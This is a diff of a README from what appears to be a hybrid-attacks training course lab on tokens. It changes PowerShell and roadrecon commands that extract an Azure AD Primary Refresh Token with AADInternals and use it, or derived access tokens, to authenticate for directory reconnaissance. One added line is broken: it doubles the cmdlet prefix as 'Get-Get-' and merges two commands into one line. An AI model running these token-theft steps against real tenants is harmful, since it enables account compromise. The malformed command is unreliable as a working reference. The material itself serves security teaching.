shackcrack007/hybrid-attacks-course-template/labs (for course sessions, not part of setup)/lab-3-tokens/README.md

 # method 2:
 $prtToken = Get-AADIntUserPRTToken
-roadrecon auth -r msgraph -c "1950a258-227b-4e31-a9cf-717495945fc2" --prt-cookie $prtToken
+roadrecon auth -r aadgraph -c "1950a258-227b-4e31-a9cf-717495945fc2" --prt-cookie $prtToken

 # method 3:
+$prtToken = Get-AADIntUserPRTToken
-$at = Get-AADIntAccessTokenForMSGraph -PRTToken $prtToken roadrecon auth --access-token $at # AT for msgraph is needed
+$at = Get-Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken roadrecon auth --access-token $at # AT for aadgraph is needed

 # Once you got an access token, look at it
 type .roadtools_auth